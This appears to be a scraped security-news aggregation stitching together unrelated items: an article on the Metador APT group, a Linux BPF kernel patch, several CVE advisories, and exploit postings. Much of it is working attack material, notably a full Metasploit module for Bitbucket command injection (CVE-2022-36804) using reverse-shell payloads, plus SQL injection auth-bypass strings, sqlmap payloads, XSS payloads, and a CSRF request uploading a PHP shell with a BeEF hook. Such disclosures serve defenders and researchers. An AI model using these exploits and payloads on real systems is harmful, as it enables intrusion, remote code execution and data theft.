A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa.
"The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security

A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa.

"The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions," researchers from SentinelOne said in a new report.

The cybersecurity firm codenamed the group **Metador** in reference to a string "I am meta" in one of their malware samples and because of Spanish-language responses from the command-and-control (C2) servers.

The threat actor is said to have primarily focused on the development of cross-platform malware in its pursuit of espionage aims. Other hallmarks of the campaign are the limited number of intrusions and long-term access to targets.

This includes two different Windows malware platforms called metaMain and Mafalda that are expressly engineered to operate in-memory and elude detection. metaMain also acts as a conduit to deploy Mafalda, a flexible interactive implant supporting 67 commands.

metaMain, for its part, is feature-rich on its own, enabling the adversary to maintain long-term access, log keystrokes, download and upload arbitrary files, and execute shellcode.

In a sign that Mafalda is being actively maintained by its developers, the malware gained support for 13 new commands between two variants compiled in April and December 2021, adding options for credential theft, network reconnaissance, and file system manipulation.

Attack chains have further involved an unknown Linux malware that's employed to gather information from the compromised environment and funnel it back to Mafalda. The entry vector used to facilitate the intrusions is unknown as yet.

What's more, references in the internal command's documentation for Mafalda suggest a clear separation of responsibilities between the developers and operators. Ultimately though, Metador's attribution remains a "garbled mystery."

"Moreover, the technical complexity of the malware and its active development suggest a well-resourced group able to acquire, maintain and extend multiple frameworks," researchers Juan Andres Guerrero-Saade, Amitai Ben Shushan Ehrlich, and Aleksandar Milenkoski noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New Metador APT Targeting Telcos, ISPs, and Universities

There exists an arbitrary memory read within the Linux Kernel BPF - Constants provided to fill pointers in structs passed in to bpf_sys_bpf are not verified and can point anywhere, including memory not owned by BPF. An attacker with CAP_BPF can arbitrarily read memory from anywhere on the system. We recommend upgrading past commit 86f44fcec22c

bpf: Disallow bpf programs call prog\_run command.

The verifier cannot perform sufficient validation of bpf\_attr->test.ctx\_in pointer, therefore bpf programs should not be allowed to call BPF\_PROG\_RUN command from within the program. To fix this issue split bpf\_sys\_bpf() bpf helper into normal kern\_sys\_bpf() kernel function that can only be used by the kernel light skeleton directly. Reported-by: YiFei Zhu <zhuyifei@google.com> Fixes: b1d18a7574d0 ("bpf: Extend sys\_bpf commands for bpf\_syscall programs.") Signed-off-by: Alexei Starovoitov <ast@kernel.org>

@@ -5071,9 +5071,6 @@ static bool syscall\_prog\_is\_valid\_access(int off, int size,

BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

{

\- struct bpf\_prog \* \_\_maybe\_unused prog;

\- struct bpf\_tramp\_run\_ctx \_\_maybe\_unused run\_ctx;

\-

switch (cmd) {

case BPF\_MAP\_CREATE:

case BPF\_MAP\_UPDATE\_ELEM:

@@ -5083,6 +5080,18 @@ BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

case BPF\_LINK\_CREATE:

case BPF\_RAW\_TRACEPOINT\_OPEN:

break;

\+ default:

\+ return -EINVAL;

\+ }

\+ return \_\_sys\_bpf(cmd, KERNEL\_BPFPTR(attr), attr\_size);

+}

+

+int kern\_sys\_bpf(int cmd, union bpf\_attr \*attr, unsigned int size)

+{

\+ struct bpf\_prog \* \_\_maybe\_unused prog;

\+ struct bpf\_tramp\_run\_ctx \_\_maybe\_unused run\_ctx;

+

\+ switch (cmd) {

#ifdef CONFIG\_BPF\_JIT /\* \_\_bpf\_prog\_enter\_sleepable used by trampoline and JIT \*/

case BPF\_PROG\_TEST\_RUN:

if (attr->test.data\_in || attr->test.data\_out ||

@@ -5113,11 +5122,10 @@ BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

return 0;

#endif

default:

\- return -EINVAL;

\+ return \_\_\_\_bpf\_sys\_bpf(cmd, attr, size);

}

\- return \_\_sys\_bpf(cmd, KERNEL\_BPFPTR(attr), attr\_size);

}

\-EXPORT\_SYMBOL(bpf\_sys\_bpf);

+EXPORT\_SYMBOL(kern\_sys\_bpf);

static const struct bpf\_func\_proto bpf\_sys\_bpf\_proto = {

.func = bpf\_sys\_bpf,

@@ -66,13 +66,13 @@ struct bpf\_load\_and\_run\_opts {

const char \*errstr;

};

\-long bpf\_sys\_bpf(\_\_u32 cmd, void \*attr, \_\_u32 attr\_size);

+long kern\_sys\_bpf(\_\_u32 cmd, void \*attr, \_\_u32 attr\_size);

static inline int skel\_sys\_bpf(enum bpf\_cmd cmd, union bpf\_attr \*attr,

unsigned int size)

{

#ifdef \_\_KERNEL\_\_

\- return bpf\_sys\_bpf(cmd, attr, size);

\+ return kern\_sys\_bpf(cmd, attr, size);

#else

return syscall(\_\_NR\_bpf, cmd, attr, size);

#endif

CVE-2022-2785: git/bpf/bpf.git - BPF kernel tree

OTFCC commit 617837b was discovered to contain a segmentation violation via /lib/x86_64-linux-gnu/libc.so.6+0xbb384.

**Product Link**

https://github.com/caryll/otfcc

**POC file**

https://github.com/Cvjark/Poc/files/9059947/id4\_SEGV\_sample\_libc6\_%2B0xbb384.zip

**Command to reproduce**

./otfccbuild --pretty [sample file] -o /dev/null

**Product name & version**

last github commit code : 617837b

**Problem Type**

SEGV

**Crash Detail**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==6233==ERROR: AddressSanitizer: SEGV on unknown address 0x6120002ad5dd (pc 0x7fbef8354384 bp 0x7ffecdbe0f10 sp 0x7ffecdbe06a8 T0)
    ==6233==The signal is caused by a READ memory access.
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: Failed to use and restart external symbolizer!
        #0 0x7fbef8354384  (/lib/x86_64-linux-gnu/libc.so.6+0xbb384)
        #1 0x4ad6eb  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4ad6eb)
        #2 0x6b53ed  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6b53ed)
        #3 0x6b6d86  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6b6d86)
        #4 0x5265aa  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x5265aa)
        #5 0x4fe3fe  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4fe3fe)
        #6 0x4f5710  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4f5710)
        #7 0x7fbef82bac86  (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #8 0x41c549  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x41c549)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) 
    ==6233==ABORTING
    

**Crash summary**

    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384)

CVE-2022-35023: Poc/CVE-2022-35023.md at main · Cvjark/Poc

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Bitbucket Git Command Injection',        'Description' => %q{          Various versions of Bitbucket Server and Data Center are vulnerable to          an unauthenticated command injection vulnerability in multiple API endpoints.          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint          creates an archive of the repository, leveraging the `git-archive` command to do so.          Supplying NULL bytes to the request enables the passing of additional arguments to the          command, ultimately enabling execution of arbitrary commands.        },        'License' => MSF_LICENSE,        'Author' => [          'TheGrandPew', # discovery          'Ron Bowes', # analysis and PoC          'Jang', # testanull - PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],          [ 'CVE', '2022-36804' ]        ],        'Platform' => [ 'linux' ],        'Privileged' => false,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Linux Dropper',            {              'Platform' => 'linux',              'Type' => :linux_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => %w[wget curl bourne],              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Type' => :unix_cmd,              'Arch' => ARCH_CMD,              'Payload' => { 'BadChars' => %(:/?#[]@) },              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }            }          ]        ],        'DisclosureDate' => '2022-08-24',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ IOC_IN_LOGS ],          'SideEffects' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        Opt::RPORT(7990),        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(target_uri.path, 'login')    )    return CheckCode::Unknown('Failed to receive response from application') unless res    unless res.body.include?('Bitbucket')      return CheckCode::Safe('Target does not appear to be Bitbucket')    end    footer = res.get_html_document&.at('footer')    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer    version_str = footer.at('span')&.children&.text    return CheckCode::Detected('Cannot find version string in footer') unless version_str    matches = version_str.match(/v(\d+\.\d+\.\d+)/)    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1    version_str = matches[1]    vprint_status("Found Bitbucket version: #{matches[1]}")    num_vers = Rex::Version.new(version_str)    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')    major, minor, revision = version_str.split('.')    case major    when '6'      return CheckCode::Appears    when '7'      case minor      when '6'        return CheckCode::Appears if revision.to_i < 17      when '17'        return CheckCode::Appears if revision.to_i < 10      when '21'        return CheckCode::Appears if revision.to_i < 4      end    when '8'      case minor      when '0', '1'        return CheckCode::Appears if revision.to_i < 3      when '2'        return CheckCode::Appears if revision.to_i < 2      when '3'        return CheckCode::Appears if revision.to_i < 1      end    end    CheckCode::Detected  end  def username    datastore['USERNAME']  end  def password    datastore['PASSWORD']  end  def authenticate    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),      'keep_cookies' => true,      'vars_post' =>      {        'j_username' => username,        'j_password' => password,        'submit' => 'Log in'      }    )    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'dashboard'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res    unless res.body.include?('Your work') && res.body.include?('Projects')      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')    end    @authenticated = true    print_good('Successfully logged into Bitbucket!')  end  def find_public_repo    print_status('Searching Bitbucket for publicly accessible repository')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),      'keep_cookies' => true    )    fail_with(Failure::Disconnected, 'Did not receive a response') unless res    json_data = JSON.parse(res.body)    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data    unless json_data['size'] > 0      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')    end    # opt for public repos unless none exist.    # Attempt to use a private repo if so    repos = json_data['values']    possible_repos = repos.select { |repo| repo['public'] == true }    if possible_repos.empty? && @authenticated      possible_repos = repos.select { |repo| repo['public'] == false }    end    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?    possible_repos.each do |repo|      project = repo['project']      next unless project      @project = project['key']      @repo = repo['slug']      break if @project && @repo    end    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo    print_good("Found public repo '#{@repo}' in project '#{@project}'!")  end  def execute_command(cmd, _opts = {})    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')    send_request_cgi(      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true,      'vars_get' =>      {        'format' => 'zip',        'path' => Rex::Text.rand_text_alpha(2..5),        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"      }    )  end  def exploit    @authenticated = false    authenticate unless username.blank? && password.blank?    find_public_repo    if target['Type'] == :linux_dropper      execute_cmdstager(linemax: 6000)    else      execute_command(payload.encoded)    end  endend

Bitbucket Git Command Injection

Linux stable versions 5.4 and 5.10 suffers from a page use-after-free via stale TLB caused by an rmap lock not held during PUD move.

Linux Stable 5.4 / 5.10 Use-After-Free / Race Condition

WorkOrder CMS version 0.1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)# Date: Sep 22, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS# Software Link:https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip# Version: 0.1.0# Tested on: Linux# Payload:username:<u>test1337<script>alert('hi');</script>password:<u>test1337<script>alert('hi');</script>

WorkOrder CMS 0.1.0 Cross Site Scripting

WorkOrder CMS version 0.1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: WorkOrder CMS 0.1.0 SQLI# Date: Sep 22, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS# Software Link:https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip# Version: 0.1.0# Tested on: Linux# Auth Bypass:username:' or '1'='1password:' or '1'='1#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql# POST Requests:Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECTCOUNT(*),CONCAT(0x7170627071,(SELECT(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/Parameter: #2* ((custom) POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECTCOUNT(*),CONCAT(0x7170627071,(SELECT(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)    Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/

WorkOrder CMS 0.1.0 SQL Injection

Multix version 2.4 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Multix 2.4 Cross Site Request Forgery

Multix version 2.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /search HTTP/1.1Host: localhostContent-Length: 24Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/searchAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7DConnection: closesearch_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=

Multix 2.4 Cross Site Scripting

A parsing vulnerability for the MessageSet type in the ProtocolBuffers versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 3.21.5 for protobuf-cpp, and versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 4.21.5 for protobuf-python can lead to out of memory failures. A specially crafted message with multiple key-value per elements creates parsing issues, and can lead to a Denial of Service against services receiving unsanitized input. We recommend upgrading to versions 3.18.3, 3.19.5, 3.20.2, 3.21.6 for protobuf-cpp and 3.18.3, 3.19.5, 3.20.2, 4.21.6 for protobuf-python. Versions for 3.16 and 3.17 are no longer updated.

Tag

#linux